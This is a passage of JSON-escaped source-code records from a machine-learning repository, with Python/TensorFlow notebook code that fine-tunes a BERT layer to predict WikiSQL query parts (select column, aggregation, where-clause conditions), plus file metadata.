activation='relu',name=\"denseWC\")(bert_output)\n denseWO = tf.keras.layers.Dense(256, activation='relu',name=\"denseWO\")(bert_output)\n \n \n sc = tf.keras.layers.Dense(13, activation='softmax',name=\"sc_output\")(denseSC)\n sa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n wn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n wc = tf.keras.layers.Dense(max_out_len, activation='sigmoid',name=\"wc_output\")(denseWC)\n wo = tf.keras.layers.Dense(max_out_len, activation='sigmoid',name=\"wo_output\")(denseWO)\n\n loss = weighted_categorical_crossentropy(weight_input) \n #loss=,\n model = tf.keras.models.Model(inputs=all_inputs, outputs=[sc,sa,wn,wc,wo])\n \n\n model.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n \"sa_output\":\"sparse_categorical_crossentropy\",\n \"wn_output\":\"sparse_categorical_crossentropy\",\n 'wc_output': loss, \n 'wo_output': loss}, optimizer='adam', metrics=['accuracy'])\n model.summary()\n \n return model\n \n\n\ndef initialize_vars(sess):\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n sess.run(tf.tables_initializer())\n K.set_session(sess)\n\n\nclass BertLayer(tf.layers.Layer):\n def __init__(self, n_fine_tune_layers=10, **kwargs):\n self.n_fine_tune_layers = n_fine_tune_layers\n self.trainable = True\n self.output_size = 768\n super(BertLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.bert = hub.Module(\n bert_path,\n trainable=self.trainable,\n name=\"{}_module\".format(self.name)\n )\n trainable_vars = self.bert.variables\n \n # Remove unused layers\n trainable_vars = [var for var in trainable_vars if not \"/cls/\" in var.name]\n \n # Select how many layers to fine tune\n trainable_vars = trainable_vars[-self.n_fine_tune_layers :]\n \n # Add to trainable weights\n for var in trainable_vars:\n self._trainable_weights.append(var)\n \n # Add non-trainable weights\n for var in self.bert.variables:\n if var not in self._trainable_weights:\n self._non_trainable_weights.append(var)\n \n super(BertLayer, self).build(input_shape)\n\n def call(self, inputs):\n inputs = [K.cast(x, dtype=\"int32\") for x in inputs]\n input_ids, input_mask, segment_ids = inputs\n bert_inputs = dict(\n input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids\n )\n result = self.bert(inputs=bert_inputs, signature=\"tokens\", as_dict=True)\n pooled_output = result['pooled_output']\n seq_output = result['sequence_output']\n \n return pooled_output, seq_output\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0], self.output_size)\n\n\n# In[6]:\n\n\nbert_module = hub.Module(\"https://tfhub.dev/google/bert_uncased_L-12_H-768_A-12/1\", trainable=True)\n\n\n# In[9]:\n\n\ndef create_tokenizer_from_hub_module(bert_hub_module_handle):\n \"\"\"Get the vocab file and casing info from the Hub module.\"\"\"\n with tf.Graph().as_default():\n tf.print('GRAPH STARTED')\n bert_module = hub.Module(bert_hub_module_handle)\n tf.print('MODULE DOWNLOADED')\n tokenization_info = bert_module(signature=\"tokenization_info\", as_dict=True)\n tf.print('TOKENIZATION INFO LOADED')\n with tf.Session() as sess:\n tf.print('SESSION STARTED')\n vocab_file, do_lower_case = sess.run([tokenization_info[\"vocab_file\"],\n tokenization_info[\"do_lower_case\"]])\n tf.print('VARIABLES RAN')\n return FullTokenizer(\n vocab_file=vocab_file, do_lower_case=do_lower_case)\n\n\n# ## BERT FORMATTING AND OUTPUT GENERATION\n\n# In[10]:\n\n\ndef generate_inputs(tokenizer, nlu1_tok, hds1):\n tokens = []\n segment_ids = []\n tokens.append(\"[CLS]\")\n\n segment_ids.append(0)\n for token in nlu1_tok:\n tokens.append(token)\n segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n header_break = [len(tokens),len(tokens) + len(hds1)]\n # for doc\n for i, hds11 in enumerate(hds1):\n sub_tok = tokenizer.tokenize(hds11)\n tokens += sub_tok\n segment_ids += [1] * len(sub_tok)\n if i < len(hds1)-1:\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n elif i == len(hds1)-1:\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n else:\n raise EnvironmentError\n\n\n return tokens, segment_ids, header_break\n\ndef _formatForBert(tokenizer, query_token, header_token, max_seq_length):\n #####For each example, tokenize with BERT tokenizer\n #Mark each example begining, and separate each header \n #so BERT understands the query is a meaningful sequence of words but the headers are not\n #concatenate the tokens with breaks but preserve where the headers stop and start\n #then pad each example to the max sequence length within each batch\n double_tokenized_tokens = []\n for (i, token) in enumerate(query_token):\n #t_to_tt_idx1.append(\n # len(double_tokenized_tokens)) # all_doc_tokens[ indicate the start position of original 'white-space' tokens.\n sub_tokens = tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n # tt_to_t_idx1.append(i)\n double_tokenized_tokens.append(sub_token) # all_doc_tokens are further tokenized using WordPiece tokenizer\n\n tokens1, segment_ids1, header_break = generate_inputs(tokenizer, double_tokenized_tokens, header_token)\n input_ids1 = tokenizer.convert_tokens_to_ids(tokens1)\n\n # Input masks\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask1 = [1] * len(input_ids1)\n\n # 3. Zero-pad up to the sequence length.\n while len(input_ids1) < max_seq_length:\n input_ids1.append(0)\n input_mask1.append(0)\n segment_ids1.append(0)\n\n assert len(input_ids1) == max_seq_length\n assert len(input_mask1) == max_seq_length\n assert len(segment_ids1) == max_seq_length\n return input_ids1,tokens1,segment_ids1,input_mask1,header_break\n\ndef formatForBert(train_data,BERT_PT_PATH= \"/DataDrive/master-wikisql/annotated_data/\",bert_type=\"uncased_L-12_H-768_A-12\",max_seq_length=222):\n \n input_ids = []\n tokens = []\n segment_ids = []\n input_masks = []\n header_breaks = []\n\n bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json')\n vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt')\n\n bert_config = BertConfig.from_json_file(bert_config_file)\n tokenizer = tokenization.FullTokenizer(\n vocab_file=vocab_file, do_lower_case=True)\n \n for train_example in train_data:\n query_token = train_example[\"query\"]\n header_token = train_example[\"header\"]\n input_ids1, tokens1, segment_ids1, input_mask1, header_break = _formatForBert(tokenizer, query_token,header_token,max_seq_length)\n input_ids.append(input_ids1)\n tokens.append(tokens1)\n segment_ids.append(segment_ids1)\n input_masks.append(input_mask1)\n header_breaks.append(header_break)\n\n #TODO return header breaks and use it too\n #bert_inputs = []\n return np.array(input_ids), np.array(input_masks), np.array(segment_ids)\n\ndef getBertOutput(bert_inputs, max_seq_length):\n all_input_ids = tf.keras.layers.Input(shape=(max_seq_length,), name = \"input_ids\")\n all_input_mask = tf.keras.layers.Input(shape=(max_seq_length,), name = \"input_masks\")\n all_segment_ids = tf.keras.layers.Input(shape=(max_seq_length,), name = \"segment_ids\")\n bert_output = BertLayer(n_fine_tune_layers=10)(bert_inputs)\n\n\n# ## READING INPUT, PARSING INTO WHAT WILL BE FED TO THE MODEL\n\n# In[11]:\n\n\ndef makeTrainingData(wikisql_path = \"/DataDrive/master-wikisql/annotated_data/\",sample_size=32,use_reduced_set=False):\n train_data, train_table, dev_data, dev_table, _, _ = load_wikisql(wikisql_path,\n use_reduced_set, sample_size, no_w2i=True, no_hs_tok=True)\n \n return parseToTextLines(train_data,train_table)\n\ndef parseToTextLines(train_data,train_table):\n train_dataframe = pd.DataFrame(train_data)\n question_toks = [[x.lower() for x in sublist] for sublist in train_dataframe[\"question_tok\"].tolist()]\n sql = train_dataframe[\"sql\"].tolist()\n table_ids = train_dataframe[\"table_id\"].tolist()\n table_headers = [[x.lower() for x in train_table[tid][\"header\"]] for tid in table_ids]\n labels = parseSqlToLabels(sql)\n assert len(question_toks)==len(table_headers)\n \n keras_model_train_data = [{\"query\":question_toks[i],\"header\":table_headers[i]} for i in range(len(question_toks))]\n return keras_model_train_data, labels\n\n\n# In[12]:\n\n\ndef load_wikisql(path_wikisql, toy_model, toy_size, bert=False, no_w2i=False, no_hs_tok=False, aug=False):\n # Get data\n train_data, train_table = load_wikisql_data(path_wikisql, mode='train', toy_model=toy_model, toy_size=toy_size, no_hs_tok=no_hs_tok, aug=aug)\n dev_data, dev_table = load_wikisql_data(path_wikisql, mode='dev', toy_model=toy_model, toy_size=toy_size, no_hs_tok=no_hs_tok)\n\n\n # Get word vector\n if no_w2i:\n w2i, wemb = None, None\n else:\n w2i, wemb = load_w2i_wemb(path_wikisql, bert)\n\n\n return train_data, train_table, dev_data, dev_table, w2i, wemb\n\n\ndef load_wikisql_data(path_wikisql, mode='train', toy_model=False, toy_size=10, no_hs_tok=False, aug=False):\n \"\"\" Load training sets\n \"\"\"\n if aug:\n mode = f\"aug.{mode}\"\n print('Augmented data is loaded!')\n\n path_sql = os.path.join(path_wikisql, mode+'_tok.jsonl')\n if no_hs_tok:\n path_table = os.path.join(path_wikisql, mode + '.tables.jsonl')\n else:\n path_table = os.path.join(path_wikisql, mode+'_tok.tables.jsonl')\n\n data = []\n table = {}\n with open(path_sql) as f:\n for idx, line in enumerate(f):\n if toy_model and idx >= toy_size:\n break\n\n t1 = json.loads(line.strip())\n data.append(t1)\n\n with open(path_table) as f:\n for idx, line in enumerate(f):\n if toy_model and idx > toy_size:\n break\n\n t1 = json.loads(line.strip())\n table[t1['id']] = t1\n\n return data, table\n\n\n# ## FORMATTING SQL LABELS\n\n# In[13]:\n\n\ndef get_g(sql_i):\n \"\"\" for backward compatibility, separated with get_g\"\"\"\n g_sc = []\n g_sa = []\n g_wn = []\n g_wc = []\n g_wo = []\n g_wv = []\n for b, psql_i1 in enumerate(sql_i):\n g_sc.append( psql_i1[\"sel\"] )\n g_sa.append( psql_i1[\"agg\"])\n\n conds = psql_i1['conds']\n if not psql_i1[\"agg\"] < 0:\n g_wn.append( len( conds ) )\n g_wc.append( get_wc1(conds) )\n g_wo.append( get_wo1(conds) )\n g_wv.append( get_wv1(conds) )\n else:\n raise EnvironmentError\n return g_sc, g_sa, g_wn, g_wc, g_wo, g_wv\n\ndef padWhereConditions(clause_list):\n b = np.zeros([len(clause_list),len(max(clause_list,key = lambda x: len(x)))])\n b[:] = -1\n for i,j in enumerate(clause_list):\n b[i][0:len(j)] = j\n return(b)\n\ndef parseSqlToLabels(sql): \n #return sql\n #return [random.randint(0, 1) for x in sql]\n sc,sa,wn,wc,wo,wv = get_g(sql)\n wc,wo = padWhereConditions(wc),padWhereConditions(wo)\n return np.array(sc),np.array(sa),np.array(wn),wc,wo\n \n#############new or modified\n\n\n#define token start and stop positions\ndef tok_hdr_start_top(input_ids):\n\ttok_pos = []\n\thead_pos = []\n\tfor idx, row in enumerate(input_ids):\n\t\t#print(idx)\n\t\t#seg positions\n\t\tsegs_long = np.where(row == 102)[0]\n\t\ttok_pos.append([1, segs_long[0]]) #start position is 1, ignore [CLS] token\n\t\tsegs = [];\n\t\tfor s in range(1,len(segs_long)):\n\t\t\tstart = segs_long[s-1] + 1 # start position\n\t\t\tend = segs_long[s] # end position\n\t\t\tsegs.append([start,end])\n\t\t\t\n\t\thead_pos.append(segs)\n\ttok_pos = np.array(tok_pos)\n\thead_pos = np.array(head_pos)\n\treturn tok_pos, head_pos\n\ndef create_wemb_masks(tok_pos, head_pos, mask_shape):\n\ttok_mask = np.zeros(mask_shape)\n\thead_mask = np.zeros(mask_shape)\n\t\n\tfor tidx, tp in enumerate(tok_pos):\n\t\ttok_mask[tidx, tp[0]:tp[1],:] = 1\n\t\n\tfor hidx, hp in enumerate(head_pos):\n\t\tfor hp1 in hp:\n\t\t\thead_mask[hidx,hp1[0]:hp1[1],:] = 1\n\t\n\treturn tok_mask, head_mask\n\t\n\t\n\t\ndef build_model_masked(max_seq_length,max_out_len, wemb_mask_shape): \n in_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n in_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n in_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n weight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n \n wemb_n_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_n_mask\")\n wemb_h_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_mask\")\n \n \n bert_inputs = [in_id, in_mask, in_segment]\n all_inputs = [in_id, in_mask, in_segment, weight_input, wemb_n_mask, wemb_h_mask]\n pooled_output, seq_output = BertLayer(n_fine_tune_layers=3)(bert_inputs)\n \n \n \n wemb_n = tf.keras.layers.Multiply()([seq_output, wemb_n_mask])\n wemb_h = tf.keras.layers.Multiply()([seq_output, wemb_h_mask])\n \n wemb_n = tf.keras.layers.Flatten()(wemb_n)\n wemb_h = tf.keras.layers.Flatten()(wemb_h)\n ####mask and shit here\n \n denseSC = tf.keras.layers.Dense(256, activation='relu',name=\"denseSC\")(wemb_h)\n denseSA = tf.keras.layers.Dense(256, activation='relu',name=\"denseSA\")(wemb_h)\n denseWN = tf.keras.layers.Dense(256, activation='relu',name=\"denseWN\")(pooled_output)\n denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(wemb_h)\n denseWO = tf.keras.layers.Dense(256, activation='relu',name=\"denseWO\")(wemb_h)\n \n \n sc = tf.keras.layers.Dense(13, activation='softmax',name=\"sc_output\")(denseSC)\n sa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n wn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n wc = tf.keras.layers.Dense(max_out_len, activation='sigmoid',name=\"wc_output\")(denseWC)\n wo = tf.keras.layers.Dense(max_out_len, activation='sigmoid',name=\"wo_output\")(denseWO)\n\n loss = weighted_categorical_crossentropy(weight_input) \n #loss=,\n model = tf.keras.models.Model(inputs=all_inputs, outputs=[sc,sa,wn,wc,wo])\n \n\n model.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n \"sa_output\":\"sparse_categorical_crossentropy\",\n \"wn_output\":\"sparse_categorical_crossentropy\",\n 'wc_output': loss, \n 'wo_output': loss}, optimizer='adam', metrics=['accuracy'])\n model.summary()\n \n return model\n \n\n\nif __name__ == \"__main__\":\n\n\tnum_CPU = 1\n\tnum_GPU = 0\n\tnum_cores = 2\n\tconfig = tf.ConfigProto(intra_op_parallelism_threads=num_cores,\n\t\t\t\t\t\tinter_op_parallelism_threads=num_cores, \n\t\t\t\t\t\tallow_soft_placement=True,\n\t\t\t\t\t\tdevice_count = {'CPU' : num_CPU,\n\t\t\t\t\t\t\t\t\t\t'GPU' : num_GPU}\n\t\t\t\t\t )\n \n\tsess = tf.Session(config = config)\n\t\n\tos.environ['TFHUB_CACHE_DIR'] = '/DataDrive/master-wikisql/tfhub_cache/'\n\n\n\t# In[3]:\n\n\n\tbert_path = \"https://tfhub.dev/google/bert_uncased_L-12_H-768_A-12/1\"\n\n\n\t# In[4]:\n\n\n\t#qsess = tf.Session()\n\ttraining_data, train_labels = makeTrainingData(use_reduced_set=True,sample_size=2000)\n\tsc,sa,wn,wc,wo = train_labels\n\tw = np.ones_like(wc.copy())\n\t#w[np.where(w>=0)] = 1\n\tw[np.where(wc==-1)] = 0\n\tmax_out_len = wc.shape[1]\n\tsplit = int(0.8*len(wc))\n\ttest_data = training_data[split:]\n\ttraining_data = training_data[:split]\n\n\ttest_labels_sc = sc[split:]\n\ttrain_labels_sc = sc[:split]\n\n\ttest_labels_sa = sa[split:]\n\ttrain_labels_sa = sa[:split]\n\n\n\ttest_labels_wn = wn[split:]\n\ttrain_labels_wn = wn[:split]\n\n\ttest_labels_wc = wc[split:]\n\ttrain_labels_wc = wc[:split]\n\n\ttest_labels_wo = wo[split:]\n\ttrain_labels_wo = wo[:split]\n\n\ttrain_weights = w[:split]\n\ttest_weights = w[split:]\n\t#test_labels = np.array(test_labels).reshape(-1, 1)\n\t#train_labels= np.array(train_labels).reshape(-1, 1)\n\n\ttrain_input_ids,train_input_masks,train_segment_ids = formatForBert(training_data)\n\ttest_input_ids,test_input_masks,test_segment_ids = formatForBert(test_data)\n\t# In[19]:\n\t#training_data,train_labels = makeTrainingData(use_reduced_set=True,sample_size=2000)\n\t# In[16]:\n\t# Build the rest of the classifier \n\t\n\t\n\t\n\tmax_seq_length = 222\n\tbert_out_size = 768\n\t\n\t#header start stopcreate masks for train and test\n\ttrain_mask_shape = (len(train_input_ids), max_seq_length, bert_out_size)\n\ttrain_tok_pos, train_head_pos = tok_hdr_start_top(train_input_ids)\n\ttrain_tok_mask, train_head_mask = create_wemb_masks(train_tok_pos, train_head_pos, train_mask_shape)\n\t\n\t\n\ttest_mask_shape = (len(test_input_ids), max_seq_length, bert_out_size)\n\ttest_tok_pos, test_head_pos = tok_hdr_start_top(test_input_ids)\n\ttest_tok_mask, test_head_mask = create_wemb_masks(test_tok_pos, test_head_pos, test_mask_shape)\n\t\n\t\n\tmodel = build_model_masked(max_seq_length=max_seq_length, max_out_len=max_out_len, wemb_mask_shape = tuple(test_mask_shape[1:]))\n\n\t# Instantiate variables\n\tinitialize_vars(sess)\n\n\tmodel.fit(\n\t\t[train_input_ids, train_input_masks, train_segment_ids, train_weights, train_tok_mask, train_head_mask], \n\t\t\t{\"sc_output\":train_labels_sc,\"sa_output\":train_labels_sa,\n\t\t\t \"wn_output\":train_labels_wn,\"wc_output\":train_labels_wc,\"wo_output\":train_labels_wo},\n\t\tvalidation_data=([test_input_ids,test_input_masks,test_segment_ids, test_weights, test_tok_mask, test_head_mask],\n\t\t\t\t\t\t {\"sc_output\":test_labels_sc,\"sa_output\":test_labels_sa,\n\t\t\t\t\t\t \"wn_output\":test_labels_wn,\"wc_output\":test_labels_wc,\n\t\t\t\t\t\t \"wo_output\":test_labels_wo}),\n\t\tepochs=1,\n\t\tbatch_size=32\n\t)\n\n\n\t# In[18]:\n\n\n\ti = 1\n\ttest_example = test_data[i]\n\tinput1,input2,input3,input4 = test_input_ids,test_input_masks,test_segment_ids[i], test_weights[i]\n\n\n\t# In[19]:\n\n\n\tmodel.predict([input1,input2,input3,input4])\n\n\n\t# In[89]:\n\n\n\t{\"sc_output\":train_labels_sc,\"sa_output\":train_labels_sa,\n\t \"wn_output\":train_labels_wn,\"wc_output\":train_labels_wc,\"wo_output\":train_labels_wo},\n\ttrain_labels_wo.max()\n\n\n\n" }, { "alpha_fraction": 0.6410866379737854, "alphanum_fraction": 0.655612587928772, "avg_line_length": 33.31071090698242, "blob_id": "80eda617093ec2f2926b5daceec907d0d2bf8be0", "content_id": "ade901f5f6136f106aab9b4ac14527186a15cd79", "detected_licenses": [ "Apache-2.0", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32356, "license_type": "permissive", "max_line_length": 184, "num_lines": 943, "path": "/wikisql_ronbert_v2.py", "repo_name": "ds-keshev/sqlova", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Copyright 2019-present NAVER Corp.\n# Apache License v2.0\n\n# Wonseok Hwang\n# Sep30, 2018\nimport os, sys, argparse, re, json,ujson\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.pylab import *\nimport tensorflow as tf\nimport random as python_random\n# import torchvision.datasets as dsets\nimport tensorflow_hub as hub\n\nfrom sqlova.utils.utils_wikisql import *\nfrom sqlova.model.nl2sql.wikisql_models import *\nfrom sqlnet.dbengine import DBEngine\nimport bert.tokenization as tokenization\nfrom bert.modeling import BertConfig, BertModel\nfrom tensorflow.keras import backend as K\nimport random\n\n\n# In[3]:\n\n\n\n# In[20]:\n\n\n# Build model\ndef weighted_categorical_crossentropy(weights):\n \"\"\"\n A weighted version of keras.objectives.categorical_crossentropy\n \n Variables:\n weights: numpy array of shape (C,) where C is the number of classes\n \n Usage:\n weights = np.array([0.5,2,10]) # Class one at 0.5, class 2 twice the normal weights, class 3 10x.\n loss = weighted_categorical_crossentropy(weights)\n model.compile(loss=loss,optimizer='adam')\n \"\"\"\n \n #weights = K.variable(weights)\n \n def loss(y_true, y_pred):\n # scale predictions so that the class probas of each sample sum to 1\n y_pred /= K.sum(y_pred, axis=-1, keepdims=True)\n # clip to prevent NaN's and Inf's\n y_pred = K.clip(y_pred, K.epsilon(), 1 - K.epsilon())\n # calc\n loss = y_true * K.log(y_pred) * weights\n loss = -K.sum(loss, -1)\n return loss\n \n return loss\n\ndef build_model(max_seq_length,max_out_len,max_header_length=13): \n in_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n in_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n in_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n #weight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n \n bert_inputs = [in_id, in_mask, in_segment]\n all_inputs = [in_id, in_mask, in_segment]\n bert_output = BertLayer(n_fine_tune_layers=3)(bert_inputs)\n\n denseSC = tf.keras.layers.Dense(256, activation='relu',name=\"denseSC\")(bert_output)\n denseSA = tf.keras.layers.Dense(256, activation='relu',name=\"denseSA\")(bert_output)\n denseWN = tf.keras.layers.Dense(256, activation='relu',name=\"denseWN\")(bert_output)\n denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(bert_output)\n denseWO = tf.keras.layers.Dense(256, activation='relu',name=\"denseWO\")(bert_output)\n \n \n sc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"sc_output\")(denseSC)\n sa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n wn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n wc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"wc_output\")(denseWC)\n wo = tf.keras.layers.Dense(3, activation='softmax',name=\"wo_output\")(denseWO)\n\n #loss = weighted_categorical_crossentropy(weight_input) \n #loss=,\n model = tf.keras.models.Model(inputs=all_inputs, outputs=[sc,sa,wn,wc,wo])\n \n\n model.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n \"sa_output\":\"sparse_categorical_crossentropy\",\n \"wn_output\":\"sparse_categorical_crossentropy\",\n #'wc_output': loss, \n #'wo_output': loss}, optimizer='adam', metrics=['accuracy'])\n 'wc_output': 'categorical_crossentropy', \n 'wo_output': 'categorical_crossentropy'}, optimizer='adam', metrics=['accuracy'])\n model.summary()\n \n return model\n\ndef initialize_vars(sess):\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n sess.run(tf.tables_initializer())\n K.set_session(sess)\n\n\n# In[128]:\n\n\n#test_labels_wc.shape\n\n\n# ## DEFINE THE ACTUAL BERT LAYER\n# \n# \n# \n# \n\n# In[12]:\n\n\n\n\n# In[6]:\n\n\nbert_module = hub.Module(\"https://tfhub.dev/google/bert_uncased_L-12_H-768_A-12/1\", trainable=True)\n\n\n# In[11]:\n\n\ndef create_tokenizer_from_hub_module(bert_hub_module_handle):\n \"\"\"Get the vocab file and casing info from the Hub module.\"\"\"\n with tf.Graph().as_default():\n tf.print('GRAPH STARTED')\n bert_module = hub.Module(bert_hub_module_handle)\n tf.print('MODULE DOWNLOADED')\n tokenization_info = bert_module(signature=\"tokenization_info\", as_dict=True)\n tf.print('TOKENIZATION INFO LOADED')\n with tf.Session() as sess:\n tf.print('SESSION STARTED')\n vocab_file, do_lower_case = sess.run([tokenization_info[\"vocab_file\"],\n tokenization_info[\"do_lower_case\"]])\n tf.print('VARIABLES RAN')\n return FullTokenizer(\n vocab_file=vocab_file, do_lower_case=do_lower_case)\n\n\n# ## BERT FORMATTING AND OUTPUT GENERATION\n\n# In[10]:\n\n\ndef generate_inputs(tokenizer, nlu1_tok, hds1):\n tokens = []\n segment_ids = []\n tokens.append(\"[CLS]\")\n\n segment_ids.append(0)\n for token in nlu1_tok:\n tokens.append(token)\n segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n header_break = [len(tokens),len(tokens) + len(hds1)]\n # for doc\n for i, hds11 in enumerate(hds1):\n sub_tok = tokenizer.tokenize(hds11)\n tokens += sub_tok\n segment_ids += [1] * len(sub_tok)\n if i < len(hds1)-1:\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n elif i == len(hds1)-1:\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n else:\n raise EnvironmentError\n\n\n return tokens, segment_ids, header_break\n\ndef _formatForBert(tokenizer, query_token, header_token, max_seq_length):\n #####For each example, tokenize with BERT tokenizer\n #Mark each example begining, and separate each header \n #so BERT understands the query is a meaningful sequence of words but the headers are not\n #concatenate the tokens with breaks but preserve where the headers stop and start\n #then pad each example to the max sequence length within each batch\n double_tokenized_tokens = []\n for (i, token) in enumerate(query_token):\n #t_to_tt_idx1.append(\n # len(double_tokenized_tokens)) # all_doc_tokens[ indicate the start position of original 'white-space' tokens.\n sub_tokens = tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n # tt_to_t_idx1.append(i)\n double_tokenized_tokens.append(sub_token) # all_doc_tokens are further tokenized using WordPiece tokenizer\n\n tokens1, segment_ids1, header_break = generate_inputs(tokenizer, double_tokenized_tokens, header_token)\n input_ids1 = tokenizer.convert_tokens_to_ids(tokens1)\n\n # Input masks\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask1 = [1] * len(input_ids1)\n\n # 3. Zero-pad up to the sequence length.\n while len(input_ids1) < max_seq_length:\n input_ids1.append(0)\n input_mask1.append(0)\n segment_ids1.append(0)\n\n assert len(input_ids1) == max_seq_length\n assert len(input_mask1) == max_seq_length\n assert len(segment_ids1) == max_seq_length\n return input_ids1,tokens1,segment_ids1,input_mask1,header_break\n\ndef formatForBert(train_data,BERT_PT_PATH= \"/DataDrive/master-wikisql/annotated_data/\",bert_type=\"uncased_L-12_H-768_A-12\",max_seq_length=222):\n \n input_ids = []\n tokens = []\n segment_ids = []\n input_masks = []\n header_breaks = []\n\n bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json')\n vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt')\n\n bert_config = BertConfig.from_json_file(bert_config_file)\n tokenizer = tokenization.FullTokenizer(\n vocab_file=vocab_file, do_lower_case=True)\n \n for train_example in train_data:\n query_token = train_example[\"query\"]\n header_token = train_example[\"header\"]\n input_ids1, tokens1, segment_ids1, input_mask1, header_break = _formatForBert(tokenizer, query_token,header_token,max_seq_length)\n input_ids.append(input_ids1)\n tokens.append(tokens1)\n segment_ids.append(segment_ids1)\n input_masks.append(input_mask1)\n header_breaks.append(header_break)\n\n #TODO return header breaks and use it too\n #bert_inputs = []\n return np.array(input_ids), np.array(input_masks), np.array(segment_ids)\n\ndef getBertOutput(bert_inputs, max_seq_length):\n all_input_ids = tf.keras.layers.Input(shape=(max_seq_length,), name = \"input_ids\")\n all_input_mask = tf.keras.layers.Input(shape=(max_seq_length,), name = \"input_masks\")\n all_segment_ids = tf.keras.layers.Input(shape=(max_seq_length,), name = \"segment_ids\")\n bert_output = BertLayer(n_fine_tune_layers=10)(bert_inputs)\n\n\n# ## READING INPUT, PARSING INTO WHAT WILL BE FED TO THE MODEL\n\n# In[9]:\n\n\ndef makeTrainingData(wikisql_path = \"/DataDrive/master-wikisql/annotated_data/\",sample_size=32,use_reduced_set=False):\n train_data, train_table, dev_data, dev_table, _, _ = load_wikisql(wikisql_path,\n use_reduced_set, sample_size, no_w2i=True, no_hs_tok=True)\n \n return parseToTextLines(train_data,train_table)\n\ndef parseToTextLines(train_data,train_table):\n train_dataframe = pd.DataFrame(train_data)\n question_toks = [[x.lower() for x in sublist] for sublist in train_dataframe[\"question_tok\"].tolist()]\n sql = train_dataframe[\"sql\"].tolist()\n table_ids = train_dataframe[\"table_id\"].tolist()\n table_headers = [[x.lower() for x in train_table[tid][\"header\"]] for tid in table_ids]\n labels = parseSqlToLabels(sql)\n assert len(question_toks)==len(table_headers)\n \n keras_model_train_data = [{\"query\":question_toks[i],\"header\":table_headers[i]} for i in range(len(question_toks))]\n return keras_model_train_data, labels\n\n\n# In[8]:\n\n\ndef load_wikisql(path_wikisql, toy_model, toy_size, bert=False, no_w2i=False, no_hs_tok=False, aug=False):\n # Get data\n train_data, train_table = load_wikisql_data(path_wikisql, mode='train', toy_model=toy_model, toy_size=toy_size, no_hs_tok=no_hs_tok, aug=aug)\n dev_data, dev_table = load_wikisql_data(path_wikisql, mode='dev', toy_model=toy_model, toy_size=toy_size, no_hs_tok=no_hs_tok)\n\n\n # Get word vector\n if no_w2i:\n w2i, wemb = None, None\n else:\n w2i, wemb = load_w2i_wemb(path_wikisql, bert)\n\n\n return train_data, train_table, dev_data, dev_table, w2i, wemb\n\n\ndef load_wikisql_data(path_wikisql, mode='train', toy_model=False, toy_size=10, no_hs_tok=False, aug=False):\n \"\"\" Load training sets\n \"\"\"\n if aug:\n mode = f\"aug.{mode}\"\n print('Augmented data is loaded!')\n\n path_sql = os.path.join(path_wikisql, mode+'_tok.jsonl')\n if no_hs_tok:\n path_table = os.path.join(path_wikisql, mode + '.tables.jsonl')\n else:\n path_table = os.path.join(path_wikisql, mode+'_tok.tables.jsonl')\n\n data = []\n table = {}\n with open(path_sql) as f:\n for idx, line in enumerate(f):\n if toy_model and idx >= toy_size:\n break\n\n t1 = json.loads(line.strip())\n data.append(t1)\n\n with open(path_table) as f:\n for idx, line in enumerate(f):\n if toy_model and idx > toy_size:\n break\n\n t1 = json.loads(line.strip())\n table[t1['id']] = t1\n\n return data, table\n\n\n# ## FORMATTING SQL LABELS\n\n# In[7]:\n\n\ndef get_g(sql_i):\n \"\"\" for backward compatibility, separated with get_g\"\"\"\n g_sc = []\n g_sa = []\n g_wn = []\n g_wc = []\n g_wo = 